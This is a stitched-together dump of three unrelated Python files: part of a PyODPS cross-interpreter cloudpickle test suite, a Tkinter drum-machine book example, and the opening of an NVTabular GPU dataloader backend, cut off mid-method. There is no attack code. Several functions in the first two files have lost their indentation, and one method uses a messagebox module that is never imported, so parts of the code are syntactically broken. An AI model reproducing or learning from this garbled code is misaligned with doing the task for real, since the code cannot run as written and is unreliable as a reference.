    `pickled` is the base64 payload written by CROSS_VAR_PICKLE_CODE: a
    pickle of (cloudpickle-bytes, client_impl).  An optional `wrapper`
    kwarg post-processes the call inside the child.
    """
    pickled, kwargs['impl'] = pickle.loads(base64.b64decode(pickled))
    wrapper_kw = {}
    if 'wrapper' in kwargs:
        wrapper_kw['wrapper'] = dumps(kwargs.pop('wrapper'))
    queue = multiprocessing.Queue()
    proc = multiprocessing.Process(target=pickled_runner, args=(queue, pickled, args, kwargs), kwargs=wrapper_kw)
    proc.start()
    proc.join()
    if proc.exitcode != 0:
        raise SystemError('Pickle process exited abnormally.')
    try:
        return queue.get()
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt /
        # SystemExit; narrowed so only ordinary failures yield None.
        return None
def _gen_nested_yield_obj():
out_closure = 10
class _NestClass(object):
inner_gain = 5
def __init__(self):
self._o_closure = out_closure
def nested_method(self, add_val):
if add_val < 5:
return self._o_closure + add_val * 2 + self.inner_gain
else:
return self._o_closure + add_val + self.inner_gain
class _FuncClass(object):
def __init__(self):
self.nest = _NestClass()
def __call__(self, add_val):
yield self.nest.nested_method(add_val)
return _FuncClass
def _gen_from_import_func():
def fun(val):
from numpy import sinh
return float(sinh(val))
return fun
class BuildMeta(type):
    # Marker metaclass used by the class-building pickle fixtures below.
    pass
class BuildBase(object):
    # Marker base class used by the class-building pickle fixtures below.
    pass
# The fixtures below exist in two variants because the newer syntax would be
# a SyntaxError on older interpreters: the modern variant is kept inside a
# string and exec'd only when the running interpreter supports it.
# Fixture: builds a class with an explicit metaclass (py2 vs py3 syntax).
if six.PY2:
    def _gen_class_builder_func():
        out_closure = 10
        def _gen_nested_class_obj():
            class BuildCls(BuildBase):
                __metaclass__ = BuildMeta
                a = out_closure
                def b(self, add_val):
                    print(self.a)
                    return self.a + add_val + out_closure
            return BuildCls
        return _gen_nested_class_obj
else:
    py3_code = textwrap.dedent("""
    def _gen_class_builder_func():
        out_closure = 10
        def _gen_nested_class_obj():
            class BuildCls(BuildBase, metaclass=BuildMeta):
                a = out_closure
                def b(self, add_val):
                    print(self.a)
                    return self.a + add_val + out_closure
            return BuildCls
        return _gen_nested_class_obj
    """)
    my_locs = locals().copy()
    six.exec_(py3_code, globals(), my_locs)
    _gen_class_builder_func = my_locs.get('_gen_class_builder_func')
# Fixture: str.format vs f-string formatting (f-strings need 3.6+).
if sys.version_info[:2] < (3, 6):
    def _gen_format_string_func():
        out_closure = 4.0
        def _format_fun(arg):
            return 'Formatted stuff {0}: {1:>5}'.format(arg, out_closure)
        return _format_fun
else:
    py36_code = textwrap.dedent("""
    def _gen_format_string_func():
        out_closure = 4.0
        def _format_fun(arg):
            return f'Formatted stuff {arg}: {out_closure:>5}'
        return _format_fun
    """)
    my_locs = locals().copy()
    six.exec_(py36_code, globals(), my_locs)
    _gen_format_string_func = my_locs.get('_gen_format_string_func')
# Fixture: extended unpacking in literals (PEP 448 generalizations, 3.5/3.6+).
if sys.version_info[:2] < (3, 6):
    def _gen_build_unpack_func():
        out_closure = (1, 2, 3)
        def merge_kws(a, b, *args, **kwargs):
            kwargs.update(dict(a=a, b=b))
            kwargs.update((str(idx), v) for idx, v in enumerate(args))
            return kwargs
        def _gen_fun(arg):
            t = out_closure + (4, ) + (5, 6, 7) + (arg, )
            l = list(out_closure) + [4, ] + [5, 6, 7]
            s = set(out_closure) | set([4]) | set([5, 6, 7])
            m = {'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5}
            wk = merge_kws(3, 4, 5, *(out_closure + (1, 2, 3)), **dict(m=1, n=2, p=3, q=4, r=5))
            return t, l, s, m, wk
        return _gen_fun
else:
    py36_code = textwrap.dedent("""
    def _gen_build_unpack_func():
        out_closure = (1, 2, 3)
        def merge_kws(a, b, *args, **kwargs):
            kwargs.update(dict(a=a, b=b))
            kwargs.update((str(idx), v) for idx, v in enumerate(args))
            return kwargs
        def _gen_fun(arg):
            t = (*out_closure, *(4, ), *(5, 6, 7), *(arg, ))
            l = [*out_closure, *(4, ), *[5, 6, 7]]
            s = {*out_closure, *[4], *[5, 6, 7]}
            m = {**dict(a=1, b=2), **dict(c=3), **dict(d=4, e=5)}
            wk = merge_kws(3, 4, 5, *out_closure, *[1, 2, 3], **dict(m=1, n=2), **dict(p=3, q=4, r=5))
            return t, l, s, m, wk
        return _gen_fun
    """)
    my_locs = locals().copy()
    six.exec_(py36_code, globals(), my_locs)
    _gen_build_unpack_func = my_locs.get('_gen_build_unpack_func')
# Fixture: np.dot vs the @ matrix-multiplication operator (PEP 465, 3.5+).
if sys.version_info[:2] < (3, 6):
    def _gen_matmul_func():
        out_closure = [[4, 9, 2], [3, 5, 7], [8, 1, 6]]
        def _gen_fun(arg):
            import numpy as np
            a = np.array(out_closure)
            b = np.array([9, 5, arg])
            c = np.dot(a, b)
            return repr(c)
        return _gen_fun
else:
    py36_code = textwrap.dedent("""
    def _gen_matmul_func():
        out_closure = [[4, 9, 2], [3, 5, 7], [8, 1, 6]]
        def _gen_fun(arg):
            import numpy as np
            a = np.array(out_closure)
            b = np.array([9, 5, arg])
            c = a @ b
            return repr(c)
        return _gen_fun
    """)
    my_locs = locals().copy()
    six.exec_(py36_code, globals(), my_locs)
    _gen_matmul_func = my_locs.get('_gen_matmul_func')
def _gen_try_except_func():
    # Fixture exercising pickling of try/except where the exception target
    # (`ex`) is also read by a nested closure (`_cl`).  NOTE(review): under
    # Python 3 the except target is unbound when its handler exits, so `_cl`
    # only sees `ex` while a handler that bound it is running -- presumably
    # intentional for the 3-to-2 pickle tests; confirm.
    out_closure = dict(k=12.0)
    def _gen_fun(arg):
        ex = None
        agg = arg
        def _cl():
            print(ex)
        try:
            agg *= out_closure['not_exist']  # always raises: key is absent
        except KeyError as ex:
            agg += 1
        try:
            agg -= out_closure['k']  # succeeds: 'k' is present
        except KeyError as ex:
            _cl()
        agg /= 10
        return agg
    return _gen_fun
def _gen_nested_fun():
out_closure = 10
def _gen_nested_obj():
# class NestedClass(object):
def nested_method(add_val):
return out_closure + add_val
return nested_method
return lambda v: _gen_nested_obj()(*(v, ))
class Test(TestBase):
    """Cross-interpreter cloudpickle round-trip tests.

    Most tests pickle an object under a *different* Python executable
    (taken from the test config keys 'py3_executable' / 'py26_executable')
    and unpickle/run it under the current interpreter via run_pickled().
    Tests silently return (skip) when the foreign executable is not
    configured.
    """
    @staticmethod
    def _invoke_other_python_pickle(executable, method_ref):
        """Run `method_ref` under `executable` and return its base64 pickle.

        Writes a temporary script rendered from CROSS_VAR_PICKLE_CODE,
        executes it with the foreign interpreter, and reads back the payload
        it wrote to a temp file.
        """
        # Propagate only odps-related sys.path entries to the child script.
        paths = [path for path in sys.path if 'odps' in path.lower()]
        if callable(method_ref):
            method_ref = method_ref.__name__
        ts_name = os.path.join(tempfile.gettempdir(), 'pyodps_pk_cross_test_{0}.py'.format(str(uuid.uuid4())))
        tp_name = os.path.join(tempfile.gettempdir(), 'pyodps_pk_cross_pickled_{0}'.format(str(uuid.uuid4())))
        script_text = CROSS_VAR_PICKLE_CODE.format(import_paths=json.dumps(paths), method_ref=method_ref,
                                                   pickled_file=tp_name)
        with open(ts_name, 'w') as out_file:
            out_file.write(script_text)
            out_file.close()
        proc = subprocess.Popen([executable, ts_name])
        proc.wait()
        if not os.path.exists(tp_name):
            raise SystemError('Pickle error occured!')
        else:
            with open(tp_name, 'r') as f:
                pickled = f.read().strip()
                f.close()
            os.unlink(tp_name)
            if not pickled:
                raise SystemError('Pickle error occured!')
            return pickled

    def testNestedFunc(self):
        """Round-trip a nested closure within the same interpreter."""
        func = _gen_nested_fun()
        obj_serial = base64.b64encode(dumps(func))
        deserial = loads(base64.b64decode(obj_serial))
        self.assertEqual(deserial(20), func(20))

    @unittest.skipIf(not PY27, 'Ignored under Python 3')
    @numpy_case
    def testFromImport(self):
        """3-to-2: function containing a `from numpy import sinh`."""
        executable = self.config.get('test', 'py3_executable')
        if not executable:
            return
        func = _gen_from_import_func()
        py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_from_import_func))
        self.assertEqual(run_pickled(py3_serial, 20), func(20))

    @unittest.skipIf(not PY27, 'Ignored under Python 3')
    def test3to2FormatString(self):
        """3-to-2: f-string vs str.format bytecode."""
        executable = self.config.get('test', 'py3_executable')
        if not executable:
            return
        func = _gen_format_string_func()
        py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_format_string_func))
        self.assertEqual(run_pickled(py3_serial, 20), func(20))

    @unittest.skipIf(not PY27, 'Ignored under Python 3')
    def test3to2BuildUnpack(self):
        """3-to-2: PEP 448 extended-unpacking bytecode."""
        executable = self.config.get('test', 'py3_executable')
        if not executable:
            return
        func = _gen_build_unpack_func()
        py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_build_unpack_func))
        self.assertEqual(run_pickled(py3_serial, 20), func(20))

    @unittest.skipIf(not PY27, 'Ignored under Python 3')
    @numpy_case
    def test3to2MatMul(self):
        """3-to-2: the `@` matrix-multiplication operator."""
        executable = self.config.get('test', 'py3_executable')
        if not executable:
            return
        func = _gen_matmul_func()
        py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_matmul_func))
        self.assertEqual(run_pickled(py3_serial, 20), func(20))

    @unittest.skipIf(not PY27, 'Ignored under Python 3')
    def test3to2TryExcept(self):
        """3-to-2: try/except with a closed-over exception target."""
        executable = self.config.get('test', 'py3_executable')
        if not executable:
            return
        func = _gen_try_except_func()
        py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_try_except_func))
        self.assertEqual(run_pickled(py3_serial, 20), func(20))

    @unittest.skipIf(not PY27, 'Ignored under Python 3')
    def test3to2NestedFunc(self):
        """3-to-2: nested closures."""
        executable = self.config.get('test', 'py3_executable')
        if not executable:
            return
        func = _gen_nested_fun()
        py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_nested_fun))
        self.assertEqual(run_pickled(py3_serial, 20), func(20))

    def testNestedClassObj(self):
        """Round-trip a nested generator-producing class in-process."""
        func = _gen_nested_yield_obj()
        obj_serial = base64.b64encode(dumps(func))
        deserial = loads(base64.b64decode(obj_serial))
        self.assertEqual(sum(deserial()(20)), sum(func()(20)))

    @unittest.skipIf(not PY27, 'Only runnable under Python 2.7')
    def test3to27NestedYieldObj(self):
        """3-to-2.7: generator method on a nested class."""
        try:
            executable = self.config.get('test', 'py3_executable')
            if not executable:
                return
        except:
            return
        func = _gen_nested_yield_obj()
        py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_nested_yield_obj))
        self.assertEqual(run_pickled(py3_serial, 20, wrapper=lambda fun, a, kw: sum(fun()(*a, **kw))),
                         sum(func()(20)))

    @unittest.skipIf(not PY27, 'Only runnable under Python 2.7')
    def test26to27NestedYieldObj(self):
        """2.6-to-2.7: generator method on a nested class."""
        try:
            executable = self.config.get('test', 'py26_executable')
            if not executable:
                return
        except:
            return
        func = _gen_nested_yield_obj()
        py26_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_nested_yield_obj))
        self.assertEqual(run_pickled(py26_serial, 20, wrapper=lambda fun, a, kw: sum(fun()(*a, **kw))),
                         sum(func()(20)))

    @unittest.skipIf(not PY27, 'Only runnable under Python 2.7')
    def test3to27NestedClassObj(self):
        """3-to-2.7: class built with an explicit metaclass."""
        try:
            executable = self.config.get('test', 'py3_executable')
            if not executable:
                return
        except:
            return
        cls = _gen_class_builder_func()()
        py3_serial = to_binary(self._invoke_other_python_pickle(executable, _gen_class_builder_func))
        self.assertEqual(run_pickled(py3_serial, 5, wrapper=lambda cls, a, kw: cls()().b(*a, **kw)),
                         cls().b(5))
|
3.08.py | """
Code illustration: 3.08
Adding support for multiple beat patterns
New methods added here:
- display_pattern_name()
- change_pattern()
- restart_play_of_new_pattern()
Methods modified here:
- create_top_bar() - added a call to display_pattern_name()
- on_pattern_changed()
Chapter 3 : Programmable Drum Machine
Tkinter GUI Application Development Blueprints
"""
import os
import time
import threading
from tkinter import Tk, Entry, W, E, N, S, PhotoImage, Checkbutton, Button, \
Menu, Frame, Label, Spinbox, END, BooleanVar
from tkinter import filedialog
import pygame
PROGRAM_NAME = ' Explosion Drum Machine '
# Sizing limits for the pattern grid.
MAX_NUMBER_OF_PATTERNS = 10
MAX_NUMBER_OF_DRUM_SAMPLES = 5
MAX_NUMBER_OF_UNITS = 5
MAX_BPU = 5
# Defaults used when a fresh pattern is created.
INITIAL_NUMBER_OF_UNITS = 4
INITIAL_BPU = 4
# Tempo settings (beats per minute).
INITIAL_BEATS_PER_MINUTE = 240
MIN_BEATS_PER_MINUTE = 80
MAX_BEATS_PER_MINUTE = 360
# Beat-button colors: alternating unit shading plus the 'toggled on' color.
COLOR_1 = 'grey55'
COLOR_2 = 'khaki'
BUTTON_CLICKED_COLOR = 'green'
class DrumMachine:
    def __init__(self, root):
        """Build the drum machine UI on top of the given Tk `root`."""
        self.root = root
        self.root.title(PROGRAM_NAME)
        # One pattern dict per slot; see init_all_patterns() for the schema.
        self.all_patterns = [None] * MAX_NUMBER_OF_PATTERNS
        self.beats_per_minute = INITIAL_BEATS_PER_MINUTE
        self.current_pattern_index = 0
        self.loop = True          # whether playback repeats the pattern
        self.now_playing = False  # flag polled by the playback thread
        self.drum_load_entry_widget = [None] * MAX_NUMBER_OF_DRUM_SAMPLES
        self.init_all_patterns()
        self.init_gui()
    def on_open_file_button_clicked(self, drum_index):
        """Return a click handler that loads a sample file for `drum_index`."""
        def event_handler():
            file_path = filedialog.askopenfilename(defaultextension=".wav",
                filetypes=[("Wave Files", "*.wav"), ("OGG Files", "*.ogg")])
            if not file_path:
                return
            self.set_drum_file_path(drum_index, file_path)
            self.display_all_drum_file_names()
        return event_handler

    def display_all_drum_file_names(self):
        """Refresh every drum-name entry from the current pattern's file list."""
        for i, drum_name in enumerate(self.get_list_of_drum_files()):
            self.display_drum_name(i, drum_name)

    def display_drum_name(self, text_widget_num, file_path):
        """Show the basename of `file_path` in the given entry widget."""
        if file_path is None:
            return
        drum_name = os.path.basename(file_path)
        self.drum_load_entry_widget[text_widget_num].delete(0, END)
        self.drum_load_entry_widget[text_widget_num].insert(0, drum_name)
    #
    # getters and setters begins
    #
    def get_current_pattern_dict(self):
        """Dict describing the currently selected pattern."""
        return self.all_patterns[self.current_pattern_index]

    def get_bpu(self):
        """Beats-per-unit of the current pattern."""
        return self.get_current_pattern_dict()['bpu']

    def set_bpu(self):
        """Store the bpu spinbox value into the current pattern."""
        self.get_current_pattern_dict()['bpu'] = int(self.bpu_widget.get())

    def get_number_of_units(self):
        """Unit count of the current pattern."""
        return self.get_current_pattern_dict()['number_of_units']

    def set_number_of_units(self):
        """Store the units spinbox value into the current pattern."""
        self.get_current_pattern_dict(
        )['number_of_units'] = int(self.number_of_units_widget.get())

    def get_list_of_drum_files(self):
        """Per-drum sample file paths (None where unset) of current pattern."""
        return self.get_current_pattern_dict()['list_of_drum_files']

    def get_drum_file_path(self, drum_index):
        """Sample file path for one drum row (may be None)."""
        return self.get_list_of_drum_files()[drum_index]

    def set_drum_file_path(self, drum_index, file_path):
        """Assign a sample file path to one drum row."""
        self.get_list_of_drum_files()[drum_index] = file_path

    def get_is_button_clicked_list(self):
        """Boolean matrix [drum][column] of toggled beat buttons."""
        return self.get_current_pattern_dict()['is_button_clicked_list']

    def set_is_button_clicked_list(self, num_of_rows, num_of_columns):
        """Reset the button matrix to all-False at the given size."""
        self.get_current_pattern_dict()['is_button_clicked_list'] = [
            [False] * num_of_columns for x in range(num_of_rows)]
    def init_all_patterns(self):
        """Create the default pattern dict for every pattern slot."""
        self.all_patterns = [
            {
                'list_of_drum_files': [None] * MAX_NUMBER_OF_DRUM_SAMPLES,
                'number_of_units': INITIAL_NUMBER_OF_UNITS,
                'bpu': INITIAL_BPU,
                'is_button_clicked_list':
                    self.init_is_button_clicked_list(
                        MAX_NUMBER_OF_DRUM_SAMPLES,
                        INITIAL_NUMBER_OF_UNITS * INITIAL_BPU
                    )
            }
            for k in range(MAX_NUMBER_OF_PATTERNS)]
    def display_pattern_name(self):
        """Show 'Pattern <n>' in the read-only pattern-name entry."""
        self.current_pattern_name_widget.config(state='normal')
        self.current_pattern_name_widget.delete(0, 'end')
        self.current_pattern_name_widget.insert(0,
            'Pattern {}'.format(self.current_pattern_index))
        self.current_pattern_name_widget.config(state='readonly')
    def on_pattern_changed(self):
        """Pattern spinbox callback: switch to the selected pattern."""
        self.change_pattern()

    def change_pattern(self):
        """Rebuild the whole UI for the newly selected pattern."""
        self.current_pattern_index = int(self.pattern_index_widget.get())
        self.display_pattern_name()
        self.create_left_drum_loader()
        self.display_all_drum_file_names()
        self.create_right_button_matrix()
        self.display_all_button_colors()
    def on_number_of_units_changed(self):
        """Units spinbox callback: resize and rebuild the button matrix."""
        self.set_number_of_units()
        self.set_is_button_clicked_list(MAX_NUMBER_OF_DRUM_SAMPLES,
                                        self.find_number_of_columns())
        self.create_right_button_matrix()

    def on_bpu_changed(self):
        """BPU spinbox callback: resize and rebuild the button matrix."""
        self.set_bpu()
        self.set_is_button_clicked_list(MAX_NUMBER_OF_DRUM_SAMPLES,
                                        self.find_number_of_columns())
        self.create_right_button_matrix()
    def play_in_thread(self):
        """Run play_pattern() on a background thread so the UI stays responsive."""
        self.thread = threading.Thread(target = self.play_pattern)
        self.thread.start()

    def on_play_button_clicked(self):
        """Play button callback."""
        self.start_play()
        self.toggle_play_button_state()

    def start_play(self):
        """Initialize audio and start the playback thread."""
        self.init_pygame()
        self.play_in_thread()

    def on_stop_button_clicked(self):
        """Stop button callback."""
        self.stop_play()
        self.toggle_play_button_state()

    def toggle_play_button_state(self):
        # Disable Play while a pattern is running; re-enable when stopped.
        if self.now_playing:
            self.play_button.config(state="disabled")
        else:
            self.play_button.config(state="normal")
def exit_app(self):
self.now_playing = False
if messagebox.askokcancel("Quit", "Really quit?"):
self.root.destroy()
    def stop_play(self):
        """Ask the playback thread to stop (it polls now_playing)."""
        self.now_playing = False

    def init_pygame(self):
        """Initialize the pygame mixer; small buffer (512) for low latency."""
        pygame.mixer.pre_init(44100, -16, 1, 512)
        pygame.init()

    def play_sound(self, sound_filename):
        """Play one drum sample; silently skip drums with no file assigned."""
        if sound_filename is not None:
            pygame.mixer.Sound(sound_filename).play()
def get_column_from_matrix(self, matrix, i):
return [row[i] for row in matrix]
    def play_pattern(self):
        """Playback loop executed on the worker thread (see play_in_thread).

        Walks the button matrix column by column, triggering the sample of
        every toggled drum, then sleeps one column's duration.  Exits when
        now_playing is cleared, or after one pass when looping is off.
        """
        self.now_playing = True
        self.toggle_play_button_state()
        while self.now_playing:
            # Re-read the matrix each pass so edits are picked up live.
            play_list = self.get_is_button_clicked_list()
            num_columns = len(play_list[0])
            for column_index in range(num_columns):
                column_to_play = self.get_column_from_matrix(
                    play_list, column_index)
                for i, item in enumerate(column_to_play):
                    if item:
                        sound_filename = self.get_drum_file_path(i)
                        self.play_sound(sound_filename)
                time.sleep(self.time_to_play_each_column())
                if not self.now_playing: break
            if not self.loop: break
        self.now_playing = False
        self.toggle_play_button_state()
def time_to_play_each_column(self):
beats_per_second = self.beats_per_minute / 60
time_to_play_each_column = 1 / beats_per_second
return time_to_play_each_column
    def on_loop_button_toggled(self):
        """Checkbutton callback: mirror the widget state into self.loop."""
        self.loop = self.loopbuttonvar.get()
    def on_beats_per_minute_changed(self):
        """Spinbox callback: read the BPM widget; takes effect on the next beat."""
        self.beats_per_minute = int(self.beats_per_minute_widget.get())
def init_is_button_clicked_list(self, num_of_rows, num_of_columns):
return [[False] * num_of_columns for x in range(num_of_rows)]
    def get_button_value(self, row, col):
        """Return whether cell (row, col) of the current pattern is active."""
        return self.all_patterns[self.current_pattern_index][
            'is_button_clicked_list'][row][col]
    def find_number_of_columns(self):
        """Total grid columns = units x beats-per-unit, read live from the widgets."""
        return int(self.number_of_units_widget.get()) * int(self.bpu_widget.get())
    def process_button_clicked(self, row, col):
        """Toggle the stored state of cell (row, col) and repaint it."""
        self.set_button_value(row, col, not self.get_button_value(row, col))
        self.display_button_color(row, col)
    def set_button_value(self, row, col, bool_value):
        """Record bool_value for cell (row, col) in the current pattern."""
        self.all_patterns[self.current_pattern_index][
            'is_button_clicked_list'][row][col] = bool_value
def on_button_clicked(self, row, col):
def event_handler():
self.process_button_clicked(row, col)
return event_handler
    def display_all_button_colors(self):
        """Repaint every cell of the button grid from the stored pattern state."""
        number_of_columns = self.find_number_of_columns()
        for r in range(MAX_NUMBER_OF_DRUM_SAMPLES):
            for c in range(number_of_columns):
                self.display_button_color(r, c)
    def display_button_color(self, row, col):
        """Paint cell (row, col): active cells get the highlight color; others
        alternate background per beat unit so units are visually grouped."""
        bpu = int(self.bpu_widget.get())
        # Alternate the base color for every other group of `bpu` columns.
        original_color = COLOR_1 if ((col//bpu) % 2) else COLOR_2
        button_color = BUTTON_CLICKED_COLOR if self.get_button_value(
            row, col) else original_color
        self.buttons[row][col].config(background=button_color)
    def create_play_bar(self):
        """Build the bottom bar: Play/Stop buttons, loop toggle, BPM spinbox,
        and the signature image."""
        playbar_frame = Frame(self.root, height=15)
        start_row = MAX_NUMBER_OF_DRUM_SAMPLES + 10
        playbar_frame.grid(row=start_row, columnspan=13,
                           sticky=W + E, padx=15, pady=10)
        self.play_icon = PhotoImage(file="images/play.gif")
        self.play_button = Button(
            playbar_frame, text='Play', image=self.play_icon, compound='left', command=self.on_play_button_clicked)
        self.play_button.grid(row=start_row, column=1, padx=2)
        Button(playbar_frame, text='Stop', command=self.on_stop_button_clicked).grid(
            row=start_row, column=3, padx=2)
        self.loopbuttonvar = BooleanVar()
        self.loopbuttonvar.set(True)
        self.loopbutton = Checkbutton(
            playbar_frame, text='Loop', command=self.on_loop_button_toggled, variable=self.loopbuttonvar)
        self.loopbutton.grid(row=start_row, column=16, padx=5)
        Label(playbar_frame, text='Beats Per Minute').grid(
            row=start_row, column=25)
        self.beats_per_minute_widget = Spinbox(playbar_frame, from_=MIN_BEATS_PER_MINUTE, to=MAX_BEATS_PER_MINUTE, width=5,
                                               increment=5.0, command=self.on_beats_per_minute_changed)
        self.beats_per_minute_widget.grid(row=start_row, column=30)
        # Seed the spinbox with the initial tempo.
        self.beats_per_minute_widget.delete(0,"end")
        self.beats_per_minute_widget.insert(0,INITIAL_BEATS_PER_MINUTE)
        photo = PhotoImage(file='images/signature.gif')
        label = Label(playbar_frame, image=photo)
        # Keep a reference so the image is not garbage-collected by Tk.
        label.image = photo
        label.grid(row=start_row, column=50, padx=1, sticky='w')
    def create_right_button_matrix(self):
        """Build (or rebuild) the grid of pattern buttons and paint it from state."""
        right_frame = Frame(self.root)
        right_frame.grid(row=10, column=6, sticky=W +
                         E + N + S, padx=15, pady=4)
        self.buttons = [[None for x in range(
            self.find_number_of_columns())] for x in range(MAX_NUMBER_OF_DRUM_SAMPLES)]
        for row in range(MAX_NUMBER_OF_DRUM_SAMPLES):
            for col in range(self.find_number_of_columns()):
                # Each button gets its own callback bound to (row, col).
                self.buttons[row][col] = Button(
                    right_frame, command=self.on_button_clicked(row, col))
                self.buttons[row][col].grid(row=row, column=col)
                self.display_button_color(row, col)
    def create_left_drum_loader(self):
        """Build the left column: one file-open button plus filename entry per drum row."""
        left_frame = Frame(self.root)
        left_frame.grid(row=10, column=0, columnspan=6, sticky=W + E + N + S)
        open_file_icon = PhotoImage(file='images/openfile.gif')
        for i in range(MAX_NUMBER_OF_DRUM_SAMPLES):
            open_file_button = Button(left_frame, image=open_file_icon,
                                      command=self.on_open_file_button_clicked(i))
            # Keep a reference so the image is not garbage-collected by Tk.
            open_file_button.image = open_file_icon
            open_file_button.grid(row=i, column=0, padx=5, pady=4)
            self.drum_load_entry_widget[i] = Entry(left_frame)
            self.drum_load_entry_widget[i].grid(
                row=i, column=4, padx=7, pady=4)
    def create_top_bar(self):
        """Build the top bar: pattern selector/name, unit-count and BPU spinboxes."""
        topbar_frame = Frame(self.root, height=25)
        topbar_frame.grid(row=0, columnspan=12, rowspan=10, padx=5, pady=5)
        Label(topbar_frame, text='Pattern Number:').grid(row=0, column=1)
        self.pattern_index_widget = Spinbox(topbar_frame, from_=0, to=MAX_NUMBER_OF_PATTERNS - 1, width=5,
                                            command=self.on_pattern_changed)
        self.pattern_index_widget.grid(row=0, column=2)
        self.current_pattern_name_widget = Entry(topbar_frame)
        self.current_pattern_name_widget.grid(row=0, column=3, padx=7, pady=2)
        Label(topbar_frame, text='Number of Units:').grid(row=0, column=4)
        self.number_of_units_widget = Spinbox(topbar_frame, from_=1, to=MAX_NUMBER_OF_UNITS, width=5,
                                              command=self.on_number_of_units_changed)
        # Seed the spinbox with the initial unit count.
        self.number_of_units_widget.delete(0,"end")
        self.number_of_units_widget.insert(0,INITIAL_NUMBER_OF_UNITS)
        self.number_of_units_widget.grid(row=0, column=5)
        Label(topbar_frame, text='BPUs:').grid(row=0, column=6)
        self.bpu_widget = Spinbox(topbar_frame, from_=1, to=MAX_BPU, width=5,
                                  command=self.on_bpu_changed)
        self.bpu_widget.grid(row=0, column=7)
        # Seed the spinbox with the initial beats-per-unit.
        self.bpu_widget.delete(0,"end")
        self.bpu_widget.insert(0,INITIAL_BPU)
        self.display_pattern_name()
    def create_top_menu(self):
        """Build the File/About menu bar."""
        self.menu_bar = Menu(self.root)
        self.file_menu = Menu(self.menu_bar, tearoff=0)
        # NOTE(review): these entries have no command= handlers wired up, so
        # Load/Save/Exit currently do nothing when selected -- confirm whether
        # handlers are attached elsewhere or still to be implemented.
        self.file_menu.add_command(label="Load Project")
        self.file_menu.add_command(label="Save Project")
        self.file_menu.add_separator()
        self.file_menu.add_command(label="Exit")
        self.menu_bar.add_cascade(label="File", menu=self.file_menu)
        self.about_menu = Menu(self.menu_bar, tearoff=0)
        self.about_menu.add_command(label="About")
        self.menu_bar.add_cascade(label="About", menu=self.about_menu)
        self.root.config(menu=self.menu_bar)
    def init_gui(self):
        """Build the full UI: menu, top bar, drum loaders, pattern grid, play bar."""
        self.create_top_menu()
        self.create_top_bar()
        self.create_left_drum_loader()
        self.create_right_button_matrix()
        self.create_play_bar()
if __name__ == '__main__':
    # Script entry point: build the Tk root window and hand it to the app.
    root = Tk()
    DrumMachine(root)
    root.mainloop()
|
backend.py | #
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import queue
import threading
import warnings
from collections import OrderedDict
import cupy as cp
from nvtabular.dispatch import _concat, _is_list_dtype, _make_df, _pull_apart_list
from nvtabular.io.shuffle import _shuffle_df
from nvtabular.ops import _get_embedding_order
from nvtabular.tags import Tags
def _num_steps(num_samples, step_size):
return math.ceil(num_samples / step_size)
class ChunkQueue:
    """This class takes partitions (parts) from an NVTabular dataset
    and concatenates them into a cudf dataframe "chunk". This chunk
    is subsequently transformed into its tensor representation using
    the iterator's transform.
    Parameters
    -----------
    qsize: int
        Max number of elements to hold in the buffer at once
    num_parts : int
        number of partitions from the iterator, an NVTabular Dataset to concatenate into a "chunk"
    shuffle : bool
        enable/disable chunk-level shuffling
    put_wait: float
        amount of timeout to wait for a full queue to open up
        before checking for errors and trying again
    """
    def __init__(self, dataloader, qsize, num_parts=1, shuffle=False, put_wait=1e-6):
        self.num_parts = num_parts
        self.shuffle = shuffle
        self.put_wait = put_wait
        self.q_out = queue.Queue(qsize)
        self._stop_event = threading.Event()
        # Only the partitions assigned to this process (device 0 of this worker).
        indices = dataloader._gather_indices_for_dev(0)
        self.itr = dataloader.data.to_iter(indices=indices)
        self.dataloader = dataloader
    def __len__(self):
        # Number of dataset partitions this queue will consume.
        return len(self.itr)
    @property
    def stopped(self):
        # True once stop() has been requested.
        return self._stop_event.is_set()
    @property
    def empty(self):
        return self.q_out.empty()
    def get(self):
        # Blocking read of the next tensor packet (or a forwarded Exception).
        return self.q_out.get()
    def put(self, packet):
        """Enqueue `packet`, polling with a short timeout so a stop request is
        never missed while blocked on a full queue.

        Returns True if the queue was stopped before the packet could be
        enqueued, False once the packet is in the queue.
        """
        while True:
            if self.stopped:
                return True
            try:
                self.q_out.put(packet, timeout=self.put_wait)
                return False
            except queue.Full:
                continue
    def batch(self, itr):
        """
        iterates through gpu_mem_frac size chunks of dataset
        and concatenates every `num_parts` of them.
        """
        current = []
        while True:
            try:
                value = next(itr)
            except StopIteration:
                # Flush the final, possibly short, group.
                if len(current) > 0:
                    yield current
                break
            current.append(value)
            if len(current) == self.num_parts:
                yield current
                current = []
    def chunk_logic(self, itr):
        """Concatenate partition groups, carry the batch-size remainder over as
        `spill`, optionally shuffle, convert to tensors and enqueue them."""
        spill = None
        for chunks in self.batch(itr):
            if self.stopped:
                return
            # Prepend rows left over from the previous chunk.
            if spill and not spill.empty:
                chunks.insert(0, spill)
            chunks = _concat(chunks)
            chunks.reset_index(drop=True, inplace=True)
            chunks, spill = self.get_batch_div_chunk(chunks, self.dataloader.batch_size)
            if self.shuffle:
                chunks = _shuffle_df(chunks)
            if len(chunks) > 0:
                chunks = self.dataloader.make_tensors(chunks, self.dataloader._use_nnz)
                # put returns True if buffer is stopped before
                # packet can be put in queue. Keeps us from
                # freezing on a put on a full queue
                if self.put(chunks):
                    return
            chunks = None
        # takes care final batch, which is less than batch size
        if not self.dataloader.drop_last and spill is not None and not spill.empty:
            spill = self.dataloader.make_tensors(spill, self.dataloader._use_nnz)
            self.put(spill)
    def load_chunks(self, dev):
